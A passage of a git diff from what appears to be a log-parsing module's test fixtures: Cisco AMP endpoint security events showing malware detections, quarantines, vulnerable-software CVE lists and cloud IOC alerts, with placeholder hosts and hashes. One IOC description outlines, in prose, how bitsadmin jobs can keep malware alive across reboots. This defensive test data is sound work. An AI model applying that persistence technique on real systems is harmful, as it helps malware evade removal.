Completed","event_type_id":553648173,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.1.2","mac":"11:50:f1:12:23:23"},{"ip":"192.168.1.1","mac":"0a:12:27:52:00:12"},{"ip":"192.168.2.1","mac":"00:c1:12:c0:22:12"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/1234d-sadf-234-sdf-123","trajectory":"https://api.eu.amp.cisco.com/v1/computers/1234d-sadf-234-sdf-123/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/123543-sdgfdf234-sadf13-123"}},"file":{"disposition":"Unknown","file_name":"locale.exe","file_path":"\\\\?\\C:\\tools\\msys64\\usr\\bin\\locale.exe","identity":{"sha256":"asdf123sdfaac359fcb0d488ca489e2d55645ce34709fdafb78e336405cb","sha1":"asdfsadf1234140de34a45db0124e5c518bf612","md5":"asdgsdrf2346523279149285c8ddc8"}}}} -{"data":{"id":123578990,"timestamp":1605079316,"timestamp_nanoseconds":611596000,"date":"2020-11-11T07:21:56+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.1","mac":"f2:18:12:23:c5:54"},{"ip":"","mac":"82:2a:e3:12:58:02"},{"ip":"","mac":"vg:de:12:00:v1:22"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/634532-sdf-234-dsfga-123","trajectory":"https://api.eu.amp.cisco.com/v1/computers/634532-sdf-234-dsfga-123/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/64535234-123dfsg-3245sdf-123"}},"file":{"disposition":"Clean","file_name":"sudo","file_path":"/usr/bin/sudo","identity":{"sha256":"123asfdsdfa125ff63033129fa1b96975ad4d6da2e2a4cf6393"}}}} -{"data":{"id":123578990,"timestamp":1605030133,"timestamp_nanoseconds":0,"date":"2020-11-10T17:42:13+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Low","start_timestamp":1605030131,"start_date":"2020-11-10T17:42:11+00:00","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.42","mac":"av:17:1b:fe:v2:f0"},{"ip":"192.168.1.1","mac":"00:42:v2:3c:12:12"},{"ip":"192.168.6.1","mac":"1f:12:27:00:00:52"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/124324df-2123-523-41231","trajectory":"https://api.eu.amp.cisco.com/v1/computers/124324df123-523-41231/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/1235643-sdf123123"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"5643234fsadgef6644b8b69e999c454c045a2d8ec476c4b6165df4ed03"},"parent":{"disposition":"Clean","identity":{"sha256":"agdfsdaf987sdf036070cca561bff5337c472313c0cb4ad"}}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"15.007.20033","cve":"CVE-2014-0566","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0566"},{"cve":"CVE-2015-3095","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3095"},{"cve":"CVE-2015-4435","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4435"},{"cve":"CVE-2015-4438","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4438"},{"cve":"CVE-2015-4441","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4441"},{"cve":"CVE-2015-4445","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4445"},{"cve":"CVE-2015-4446","score":"7.5","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4446"},{"cve":"CVE-2015-4447","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4447"},{"cve":"CVE-2015-4448","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4448"},{"cve":"CVE-2015-4451","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4451"},{"cve":"CVE-2015-4452","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4452"},{"cve":"CVE-2015-5085","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5085"},{"cve":"CVE-2015-5086","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5086"},{"cve":"CVE-2015-5087","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5087"},{"cve":"CVE-2015-5090","score":"7.2","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5090"},{"cve":"CVE-2015-5091","score":"7.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5091"},{"cve":"CVE-2015-5093","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5093"},{"cve":"CVE-2015-5094","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5094"},{"cve":"CVE-2015-5095","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5095"},{"cve":"CVE-2015-5096","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5096"},{"cve":"CVE-2015-5097","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5097"},{"cve":"CVE-2015-5098","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5098"},{"cve":"CVE-2015-5099","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5099"},{"cve":"CVE-2015-5100","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5100"},{"cve":"CVE-2015-5101","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5101"},{"cve":"CVE-2015-5102","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5102"},{"cve":"CVE-2015-5103","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5103"},{"cve":"CVE-2015-5104","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5104"},{"cve":"CVE-2015-5105","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5105"},{"cve":"CVE-2015-5106","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5106"},{"cve":"CVE-2015-5108","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5108"},{"cve":"CVE-2015-5109","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5109"},{"cve":"CVE-2015-5110","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5110"},{"cve":"CVE-2015-5111","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5111"},{"cve":"CVE-2015-5113","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5113"},{"cve":"CVE-2015-5114","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5114"},{"cve":"CVE-2015-5115","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5115"},{"cve":"CVE-2017-11211","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11211"},{"cve":"CVE-2017-11212","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11212"},{"cve":"CVE-2017-11214","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11214"},{"cve":"CVE-2017-11216","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11216"},{"cve":"CVE-2017-11218","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11218"},{"cve":"CVE-2017-11219","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11219"},{"cve":"CVE-2017-11220","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11220"},{"cve":"CVE-2017-11221","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11221"},{"cve":"CVE-2017-11222","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11222"},{"cve":"CVE-2017-11223","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11223"},{"cve":"CVE-2017-11224","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11224"},{"cve":"CVE-2017-11226","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11226"},{"cve":"CVE-2017-11227","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11227"},{"cve":"CVE-2017-11228","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11228"},{"cve":"CVE-2017-11229","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11229"},{"cve":"CVE-2017-11234","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11234"},{"cve":"CVE-2017-11235","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11235"},{"cve":"CVE-2017-11237","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11237"},{"cve":"CVE-2017-11241","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11241"},{"cve":"CVE-2017-11251","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11251"},{"cve":"CVE-2017-11254","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11254"},{"cve":"CVE-2017-11256","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11256"},{"cve":"CVE-2017-11257","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11257"},{"cve":"CVE-2017-11259","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11259"},{"cve":"CVE-2017-11260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11260"},{"cve":"CVE-2017-11261","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11261"},{"cve":"CVE-2017-11262","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11262"},{"cve":"CVE-2017-11263","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11263"},{"cve":"CVE-2017-11267","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11267"},{"cve":"CVE-2017-11269","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11269"},{"cve":"CVE-2017-11270","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11270"},{"cve":"CVE-2017-11271","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11271"}]}} diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json deleted file mode 100644 index 52efeb8e97b..00000000000 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json +++ /dev/null @@ -1,87 +0,0 @@ -[ - { - "@timestamp": "2020-11-11T09:51:38.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "1235-1234sdgf-654sdf-7562345", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "192.168.196.22", - "mac": "aa:d9:ac:af:1d:ad" - }, - { - "ip": "192.168.120.1", - "mac": "12:24:56:c2:00:01" - }, - { - "ip": "192.168.160.1", - "mac": "12:50:56:c2:53:08" - } - ], - "cisco.amp.connector_guid": "1235-1234sdgf-654sdf-7562345", - "cisco.amp.detection": "W32.Trojan.22gp.1201", - "cisco.amp.detection_id": "12365423467", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Unknown", - "cisco.amp.group_guids": [ - "6542345gdfs-234-sdf2-34-6345243" - ], - "cisco.amp.related.mac": [ - "aa:d9:ac:af:1d:ad", - "12:24:56:c2:00:01", - "12:50:56:c2:53:08" - ], - "cisco.amp.timestamp_nanoseconds": 153000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 123578990, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "9a8557b98ed1469272fa0ace91d63477", - "file.hash.sha1": "d0c4192b65e36553fvfd2b83f3113f6ae8390baa", - "file.hash.sha256": "e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc", - "file.name": "HYXiN3hY.exe.part", - "file.path": "\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\HYXiN3hY.exe.part", - "fileset.name": "amp", - "host.hostname": "testhost", - "host.name": "testhost", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@domain", - "input.type": "log", - "log.offset": 0, - "process.hash.md5": "e50ab86d5409d4d0ad386b27ea7f78fb", - "process.hash.sha1": "d539afb0991e823c7cdf824b610a5a5d7655a2da", - "process.hash.sha256": "a7ca534327103ec5fac749f5ab8b7a1fe81209aa580a52df656284ef6215f0ab", - "process.name": "firefox.exe", - "process.pid": 88, - "related.hash": [ - "e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc", - "9a8557b98ed1469272fa0ace91d63477", - "d0c4192b65e36553fvfd2b83f3113f6ae8390baa" - ], - "related.hosts": [ - "testhost" - ], - "related.ip": [ - "8.8.8.8", - "192.168.196.22", - "192.168.120.1", - "192.168.160.1" - ], - "related.user": [ - "user@domain" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - } -] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log new file mode 100644 index 00000000000..211de5d2bc9 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log @@ -0,0 +1,49 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} 